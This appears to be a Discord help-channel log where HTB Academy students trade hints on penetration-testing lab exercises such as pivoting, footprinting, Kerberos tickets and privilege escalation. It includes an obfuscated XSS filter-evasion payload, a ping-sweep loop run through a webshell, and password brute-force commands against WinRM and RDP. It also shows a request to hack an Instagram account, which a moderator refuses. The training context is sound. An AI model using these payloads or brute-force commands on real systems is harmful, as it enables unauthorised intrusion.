don't use gobuster no matter what people tell you : )

rustic sage
#

ive been trying ffuf for 2 days

#

the problem is i cant find the parameter

raven cairn
#

Damn I haven't done that module in a while

#

And my notes suck : (

thorn urchin
#

but odd that finding the paremeter is the sticking point

raven cairn
rustic sage
#

I feel kind of stupid right now not being able to find a php.ini file

rustic sage
thorn urchin
#

oh this one isnt even finding the paremeter

#

you ssh in

#

and find it on the box

raven cairn
#

The format of your answer will be /xxx/xxxx/xx/xxxxxx/php.ini

rustic sage
#

oh

#

shit

#

bruh

#

i thought i had to

#

fuzz

raven cairn
#

Does that help my dude?

rustic sage
#

the whole time

thorn urchin
#

no fuzz lol

rustic sage
thorn urchin
#

the second question has you editing the file

rustic sage
#

ok i did the first question

ripe terrace
#

The script in INTRODUCTION TO BASH SCRIPTING / Flow Control - Loops throws the following error for me. Is that a result of the incorrect salt being passed, or is something incorrectly configured in pwnbox?

*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
140356658070848:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:
ripe terrace
#

^ scratch that. It was just an incorrect salt value.

raven cairn
#

Nice Job sunglas

glass locust
#

exit

rustic sage
#

Hi

pliant sage
#

has anybody done the socksoverrdp thing in pivoting tunneling ?

#

when I unzip the SocksOverRDP directory the .dll file keeps disappearing from the pivot...

#

nvm defender was deleting it

green grotto
#

I'm doing well

pliant sage
#

aight could someone help me w/ socksoverrdp? I can't get it to work and I don't understand what I'm doing wrong

green grotto
#

I'm doing well

pliant sage
#

I think I misconfigured proxifier because it doesn't seem to detect mstsc's attempt to connect

#

but I can't figure out what I did wrong

pliant sage
#

no one?

solar granite
#

Which module is that?

pliant sage
#

what address am I supposed to use in mstsc.exe?

solar granite
#

Enumerate that service further. Hint: ||check the banner||

solar granite
#

DM me if you need more help

#

DM me what you found

pliant sage
#

yo

#

I'm trying to run for i in {1..254} ; do (ping -c 1 172.16.5.$i | grep "bytes from" & );done through a webshell

#

but for some reason it doesn't loop, $i just takes {1..254} as a value

#

any ideas why?

gloomy tangle
#

I am stuck also there 😩 run rpcclient with user/pass and the group its assigned, it doesn't match the answer

solar granite
pliant sage
#

it's alright i found a workaround

solar granite
#

Cool

green ingot
#

Anyone here read "hacking the art of exploitation" 2nd edition ? And is it good for starting to get into hacking ?

solar granite
#

It's probably good if you like learning from books
There are definitely better resources tho

green ingot
rustic sage
#

Hi all, Im doing ICMP Tunneling with SOCKS section in Pivoting, Tunneling, and Port Forwarding Module, and when I transfer ptunnel-ng to ubuntu server, it gives me this error: ./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory
Any hint?

rustic sage
#

This is necessary to complete the exercise

solar granite
# green ingot can you send me some of the better resources ?

Any of the reputable ones are great: HTB, HTB Academy, THM, Cyber Mentor, PortSwigger, and probably many more, but these come to mind right now.
As for books, that depends on what you're after, and I don't really know many, but Network Security Assessment is really good, and I've seen a few others recommended

solar granite
# rustic sage

I had another issue with the tool, and I couldn't get it to work. You can, however, complete the exercise in other ways

raven nest
#

Who can hack instagram accounts?

rustic sage
#

Can someone help explain some bash scripting to me?

Introduction to Bash Scripting -> Conditional Execution

Got the answer, but could use someone experienced to help explain how the loop works

rustic sage
raven nest
rustic sage
#

Riiiight ahahaha

raven nest
#

Could you do that

carmine kiln
#

if you are not here to learn then it's not the right place for you

raven nest
#

Ok fuck that she just cheated on me

carmine kiln
vital adder
#

the gf or the instagram?

raven nest
#

Noo no she cheated on me and we break up

#

The gf

#

Haha

carmine kiln
#

Look, we are not going to help or give advice on illegal activities

raven nest
#

Bur you know how?

rustic sage
carmine kiln
#

++kick 1007292874402037870 continued asking for help in illegal activities

little whaleBOT
#

Mos got the boot!

vital adder
pliant sage
#

is there a "good" way of getting files from a machine you pivoted to back to your host? Or do I have to upload them back to the pivot then to my host?

#

asking for the pivoting tunneling skills assessment

carmine kiln
#

you could use wget, curl

#

or netcat

#

lots of ways

#

all of these commands allow to upload a file

pliant sage
#

but would that work? since my machine and the host aren't on the same network?

vital adder
#

in that network you have to go through multiple machine

pliant sage
#

maybe it's a dumb question sorry 😅

vital adder
shell scaffold
#

uploading with internet connection you can use transfer.sh or something

pliant sage
#

i remembered pypykatz but the machine doesn't have python on it

carmine kiln
#

using what

pliant sage
#

i have rdp to the machine

carmine kiln
#

how are you connected?

#

nvm

vital adder
#

i bet with autoroute and proxychains

vital adder
pliant sage
#

and proxychains

pliant sage
#

well, machine died anyway time fro a break

placid quest
#

@pliant sage if rpivot works tell me

pliant sage
placid quest
#

@pliant sage ok, rpivot did not work on my side so i had to use another method

pliant sage
#

for the client on the pivot I used the pre-built one, not the github cloned one

modern ridge
#

hello all. how do I navigate to the academy footprinting medium lab questions here on discord ?

solar granite
feral stump
deft lagoon
#

hey guys i need help with the footprinting easy lab. So ive done the enumeration and i got back 2 ftp ports. If i try to connect via ftp user@<ip> and then login it directly enters passive mode and . With wget i got the folder .ssh which has my public and private key. Now i have to give the public key to the ssh but how?? Thanks for any help.

pliant sage
placid quest
#

@pliant sage so it took time to work

vital adder
deft lagoon
vital adder
#

nope you don't need to do that just get the ||private key|| and use that to login

deft lagoon
#

but how??

deft lagoon
#

i already have the keys

vital adder
deft lagoon
#

which key do i have to upload?

#

my private key?

vital adder
#

not your the one you get on the ||ftp||

deft lagoon
#

jes i did

#

lets go private chat maybe

vital adder
#

did it give you any error?

deft lagoon
#

no connection refused

vital adder
#

oh yeah i forgot about spoiler

deft lagoon
#

private chat?

vital adder
#

yep shoot me a dm

deft lagoon
#

did

rustic sage
vital adder
#

all i remember about that error is it just randomly appear and disappear

#

but i'll give that a check after i'm done helping some people

rustic sage
#

I will reset the target

autumn pilot
#

make sure that you are executing the cmd prompt as an admin

vital adder
#

also the ||AV|| for that machine is on

vital adder
unique valve
# rustic sage

Also make sure something on the system hasnt quarantined the file.

rustic sage
#

Real time protecion was enabled xd

#

now it is working

#

Good day colleagues, I'm lost in the last Windows fundamentals test.

digital juniper
#

hi

rustic sage
#

I couldn't solve the last test I'm stuck with the final questions

kind vessel
thorn urchin
lucid bloom
#

normal that used ||theme for rev shell|| at getting started?

lucid bloom
#

at windows fundamantals section ntfs vs share permissions first question - isn´t the anwsser ||Server Message Block protocol||? But it says its wrong

rustic sage
#

DM Me if you still need help

waxen barn
#

On the PtT w/ Linux module and trying to figure out how to switch from carlos to the svt_workstations account. I’ve used kinit to transfer the ticket and keytabextract, which gave me the AES-256 hash, but not NTLM. I’ve not been able to crack the AES-256 hash so far. Any recommendations?

waxen barn
#

Nevermind. Tried keytabextract on the ._all.kt file and it gave me an NTLM hash.

fathom mortar
#

Hello Guys, can anyone help me on Password Attack module

#

Pass the Ticket on Linux

lucid bloom
rustic sage
#

I've sent a request

#

One question, once a module is finished and a subscription is expired. Can I keep watching the updated content added to that module?

undone belfry
#

I have a question, about "shells & payloads - live engagement". There is any browser on the machine we are connected via rdp? Or we have to proceed, without browser?

gilded violet
#

Is there anything specific to cloud security? Like a road map or something

unique valve
placid quest
gilded violet
#

Thank you so much

placid quest
#

@gilded violet no problem

sly tapir
#

i cannot for the life of my figure out this password for the broken authentication module skills assessment. i either suck at filtering lists or i am deep in a rabbit hole

steep loom
#

I can find the cookie to decode, decode it from url and notice that it there are 2 parts, one that changes based on session on that I think is the username encoded somehow. I for the life of me cant figure out where to go from there

vital adder
#

if you having issue decoding the cookie just use CyberChef if you have decode the cookie change you can use the same role at ||question 1||

vital adder
mellow turtle
#

@vital adder do u have notes about ACTIVE DIRECTORY ENUMERATION & ATTACKS / Bleeding Edge Vulnerabilities/ PetitPotam (MS-EFSRPC) attack?

vital adder
#

nope (haven't done the module)

mellow turtle
#

okey, im having as problem with the last type of attack its not necessary to complete the section but i want to try it :/

steep loom
safe token
#

hey. not academy stuff but i can't write to the main channel so. what should i try i this doesn't go thrgough the xss filter?
<img/src="funny.jpg"onload=java
script:eval(ale&#x0Drt('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))>

steep loom
vital adder
pastel ginkgo
mellow turtle
#

yup

steep loom
pastel ginkgo
#

I only got so far on the first where I couldnt read what what was in the file on the admin desktop

#

when I get to stage 3 of the print nightmare it shits the bed

#

now it wont execute at all lol

mellow turtle
#

let me check

#

@pastel ginkgo dm me

#

and lets see whats happening there

vital adder
pastel ginkgo
#

Kinda seems like an oversight that people who are not verified have access to the academy text channels

thorn urchin
#

Yeah I agree

#

not sure where to make a more formal suggestion about it

pastel ginkgo
#

I think the forms have suggestions idk how active it is

thorn urchin
#

tagged one of the staff during a sprint a spammers and suggested it but they didnt mention anything back about it

leaden kettle
#

Can someone advise me on how I can start hacking apps?

thorn urchin
#

depends on your definition of hacking and definition of apps

leaden kettle
#

Android games

thorn urchin
#

yeah no modules for that stuff

rustic sage
#

Probably something else online for that

#

Could try the Linux repository tho

leaden kettle
#

or what program do you use to modify the money, diamonds, gold in the online games?

thorn urchin
leaden kettle
#

where can i ask?

sturdy kite
#

how can i use my own VM in section questions? instead of the pwnbox

stiff moon
#

yo yo on the module "PASSWORD ATTACKS" in "Pass the Ticket (PtT) from Linux"

the last question "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response"

i dont get it. I thought I found the right file. i used linikatz and nothing works.
any help?

cyan oar
pastel ginkgo
junior shell
#

I have a question on the Windows Privilege Escalation for the SeDebugPrivilege section. I am currently RDP into the host with jordan user. When i go to check whoami /priv I do not have SeDebugPrivilege

sturdy kite
rustic sage
#

install openvpn

#

and then openvpn filepath

autumn trout
#

Anyone managed to do the zap web fuzzing part of the module? I heave been stuck for 2 days and it is driving me mad on why I can't get it working

stiff moon
rustic sage
#

What is the name of the group that is present in the company data share permissions ACL by default? can i explain me

sly tapir
sly tapir
sturdy kite
#

anyone tried using VirtualBox on Mac M1 chip?

sturdy kite
#

now im seeing this

karmic mantle
sturdy kite
#

oh wait

#

no

#

amd

#

im using the security edition, theres only an amd option

karmic mantle
#

Only ARM works for M1 Macs. You can do an x86 Parrot OS docker container since the docker software runs using Rosetta. But afaik VMs need to be ARM

sturdy kite
#

ooofff... only ARM isos work?

karmic mantle
#

Yeah. Some software is missing in the ARM version. Also compiling exploits will not work unless you compile it on the target machine itself. That’s why I keep a Parrot OS docker image handy

sturdy kite
#

is this only an issue with parrot os? can i try a different distro?

patent obsidian
#

hello someone who has already done the FILE UPLOAD ATTACKS module

karmic mantle
#

I use Kali ARM distro for my VM

#

@sturdy kite

sturdy kite
#

@karmic mantle so, any distro I want to run must be ARM?

patent obsidian
sly tapir
final elm
#

hola

karmic mantle
#

Yeah. The M1 Chip is an ARM chip. So only ARM distros work on it.

patent obsidian
#

in the beginning

sturdy kite
#

@karmic mantle now im getting this issue

rustic sage
#

:(

hidden trellis
#

how do we know if the integrity of a pro lab machine has not been altered? I have found creds for a user but they wont work

runic fern
#

Can people legally pay hackers to do their hacking work

drifting glacier
#

Working on the exercise section for active subdomain enumeration, currently getting server refusal messages when attempting to query inlanefreight.htb

#

More error messages like that, any nudge in the right direction?

thorn urchin
drifting glacier
#

oh, so i should add the address of the spawn target to that command?

thorn urchin
#

youd need to select it as your dns server for the command yeah

rich vale
#

wheres the best place to ask a noob question related to htb academy?

vital adder
vital adder
rich vale
#

just at the beginning of AD Enumeration & Attacks, but confused on something I think is simple

#

connected to the VPN, and then used xfreerdp to get on the Linux attack host... but can't seem to launch wireshark with enough permissions to listen on the relevant interfaces

#

what am I missing? shouldn't i be able to launch wireshark and capture, as the instructions indicate?

#

nevermind, issue resolved... 4th or so attempt at pasting in the password for the htb-student user and it launched correctly

tidal mango
#

Anyone able to get the PrintNighmare exploit, in Active Directory --Bleeding Edge Vulnerabilities-- to work? I get an error from python once the windows box tries to connect back to my share. I was hoping someone else has some insight on this? Thanks!

loud sapphire
#

yo. quick one, can someone DM me please?

I have to answer as part of Meterpreter Tunneling & Port Forwarding: Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)

I have completed this and am on the windows box.... Im just not seeing the correct route that autoroute is providing.

rustic sage
#

wtf why does some bruteforcing programs dont stop, after a password is found ?

Examples:

#

crackmapexec winrm IP -u 'USERNAME' -p mylist.txt

#

or:
crowbar --server IP -u USER -C FILE -b rdp -v

i mean.. why ?!

loud sapphire
#

you didnt tell it to stop probably. though crackmap stops automatically.. wasnt it hydra that doesnt? might be the other way around byt either way. there should be a switch to get it to stop

rustic sage
#

the funny thing is, crackmapexec with smb stopped immediately. Exact same command, just smb instead of winrm. LOL ?

loud sapphire
#

else they have a discord. the makers of crackmap i mean. they are super helpful and fast at it too

loud sapphire
vital adder
vital adder
vital adder
vital adder
#

but with this you can't see the verbose

vital adder
loud sapphire
#

yay

rustic sage
#

Yo thanks. For everyone, until we know why:

crackmapexec | grep 'Pwned!'

crowbar

  • doesnt have a 'stop-switch' until now
  • BUT creates crowbar.log (bad-pw) & crowbar.out (correct-pw) in current dir
finite gorge
#

Hey guys, anybody completed the Windows fundamentals skill assessment?

#

Not some direction to complete that section of the module.

modern ridge
#

here I am at the Footprinting Hard Lab. I can see ssh/pop3/imap ports open but I have no credentials to get in. SNMP is not present. Is bruteforcing the enxt step ?

placid quest
#

@modern ridge use onesixtyone tool

modern ridge
#

i did. and since SNMP is not running the tool return nothing. I guess they changed that

#

only ssh pop or imap. thats it

static sapphire
#

hi guys, i'm new here

modern ridge
#

hi. same

modern ridge
static sapphire
#

actually it's my first time on discord

modern ridge
#

welcome. then.

static sapphire
#

thanks

modern ridge
lone halo
#

Yo i just started with raspberry pi pico

#

Looks interesting

placid quest
#

@modern ridge look in seclist u will find the list that u can use

modern ridge
#

progress. at last

placid quest
#

@modern ridge so u got it

modern ridge
#

halfway yes. found stuff. thanks

modern ridge
#

Hard lab completed ! oof

rustic sage
#

Good day, I am confused, in the Occam's Razor section in Learning Process module, what is the point of Occam's in talking about SQL injection being the same in terms of concept but the individual steps being complicated?

I mean, I understand that Occam's razor is saying not to assume what is not, i.e the simplest explanation is probably the best one.

I can't seem to understand the point in using the SQL injection/pentesting explanation side by side Occam's.

#

I don't understand that section.

placid quest
#

@modern ridge ok

worn tusk
#

hi

#

i am stuck with this question 'What is the path to the htb-student's mail?'

placid quest
#

@worn tusk look in var

worn tusk
#

yeah i did but still showing wrong

worn tusk
#

still ain't getting

#

tried var/spool/mail and var/mail